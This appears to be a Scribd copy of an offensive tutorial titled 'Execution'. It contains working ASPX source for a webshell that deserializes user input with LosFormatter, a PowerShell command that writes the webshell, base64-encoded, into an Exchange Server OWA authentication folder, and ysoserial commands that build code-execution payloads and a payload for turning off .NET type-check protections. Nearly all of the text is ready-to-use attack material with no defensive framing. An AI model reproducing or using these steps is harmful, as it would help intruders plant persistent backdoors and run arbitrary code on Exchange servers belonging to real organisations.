Execution | PDF | Text File | Software Development
Scribd
Upload
63 views

Execution

This document discusses using Powershell to upload a webshell payload to a system and serialize it to bypass defenses. It provides commands to base64 encode a webshell, write it to a file on the system, and use ysoserial to generate payloads that can be used in the webshell to execute code or disable .NET protections.

Uploaded by

Ehsan Vesali
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
63 views

Execution

This document discusses using Powershell to upload a webshell payload to a system and serialize it to bypass defenses. It provides commands to base64 encode a webshell, write it to a file on the system, and use ysoserial to generate payloads that can be used in the webshell to execute code or disable .NET protections.

Uploaded by

Ehsan Vesali
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 2

Execution

Powershell

uploader.cs

<%@ Page Language="C#" Debug="true" validateRequest="false" %>


<%@ Import Namespace="System.Text" %>

<%@ Import Namespace="System.Diagnostics" %>

<%@ Import Namespace="System.IO" %>

<%@ Import Namespace="System" %>

<%@ Import Namespace="System.Runtime.Serialization" %>

<script runat="server">

protected void INPUT_Click(object sender, EventArgs e)

LosFormatter Formatter = new LosFormatter();

Formatter.Deserialize( INPUT.Text.ToString() );

</script>

<html>

<body>

<form id="Form1" runat="server" >

<asp:Panel ID="authentication" runat="server" HorizontalAlign="Center" >

<asp:TextBox runat="server" ID="INPUT" Value="" BackColor="#404040"


ForeColor="White" style="width: 50%; height: 200px;"/>

<div runat="server" style="width: auto; text-align:center">

<asp:Button ID="Click" runat="server" Text="Execute" OnClick="INPUT_Click" />

</div>

</asp:Panel >

</form>

</body>

</html>

copy base64 web shell to system

www.NooraNet.com
powershell -command
$nss='PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiBEZWJ1Zz0idHJ1ZSIgdmFsaWRhdGVSZXF1ZXN0PSJmY
WxzZSIgJT4KPCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5UZXh0IiAlPgo8JUAgSW1wb3J0IE5h
bWVzcGFjZT0iU3lzdGVtLkRpYWdub3N0aWNzIiAlPgo8JUAgSW1wb3J0IE5hbWVzcGFjZT0iU3lzdGV
tLklPIiAlPgo8JUAgSW1wb3J0IE5hbWVzcGFjZT0iU3lzdGVtIiAlPgo8JUAgSW1wb3J0IE5hbWVzcG
FjZT0iU3lzdGVtLlJ1bnRpbWUuU2VyaWFsaXphdGlvbiIgJT4KCjxzY3JpcHQgcnVuYXQ9InNlcnZlc
iI+CnByb3RlY3RlZCB2b2lkIElOUFVUX0NsaWNrKG9iamVjdCBzZW5kZXIsIEV2ZW50QXJncyBlKQp7
CgkJTG9zRm9ybWF0dGVyIEZvcm1hdHRlciA9IG5ldyBMb3NGb3JtYXR0ZXIoKTsKCQlGb3JtYXR0ZXI
uRGVzZXJpYWxpemUoIElOUFVULlRleHQuVG9TdHJpbmcoKSApOwp9Cjwvc2NyaXB0Pgo8aHRtbD4KPG
JvZHk+Cjxmb3JtIGlkPSJGb3JtMSIgcnVuYXQ9InNlcnZlciIgPgo8YXNwOlBhbmVsIElEPSJhdXRoZ
W50aWNhdGlvbiIgcnVuYXQ9InNlcnZlciIgSG9yaXpvbnRhbEFsaWduPSJDZW50ZXIiID4KPGFzcDpU
ZXh0Qm94IHJ1bmF0PSJzZXJ2ZXIiIElEPSJJTlBVVCIgVmFsdWU9IiIgQmFja0NvbG9yPSIjNDA0MDQ
wIiBGb3JlQ29sb3I9IldoaXRlIiBzdHlsZT0id2lkdGg6IDUwJTsgaGVpZ2h0OiA0MDBweDsiLz4KPG
RpdiBydW5hdD0ic2VydmVyIiBzdHlsZT0id2lkdGg6IGF1dG87IHRleHQtYWxpZ246Y2VudGVyIj4KP
GFzcDpCdXR0b24gSUQ9IkNsaWNrIiBydW5hdD0ic2VydmVyIiBUZXh0PSJFeGVjdXRlIiBPbkNsaWNr
PSJJTlBVVF9DbGljayIgLz4KPC9kaXY+CjwvYXNwOlBhbmVsID4KPC9mb3JtPgo8L2JvZHk+CjwvaHR
tbD4=';$z = [Convert]::FromBase64String($nss);$z=
[System.Text.Encoding]::ASCII.GetString($z);sc -path "c:\'Program
Files'\Microsoft\'Exchange
Server'\V15\FrontEnd\Httpproxy\owa\auth\nssupdate251.aspx" -value $z

Serialize your web shell

ysoserial.exe -g ActivitySurrogateSelectorFromFile -f LosFormatter -c


"nooranet.cs;System.dll;System.Web.dll;System.Data.dll;System.Xml.dll;System.Ru
ntime.Extensions.dll;Microsoft.AspNet.FriendlyUrls.dll;" > nooranet.txt

copy nooranet.txt content in uploader if doesn't work create payload for disable .Net Protection

ysoserial.exe -g ActivitySurrogateDisableTypeCheck -f LosFormatter -c "ignored"


> disable.txt

www.NooraNet.com

You might also like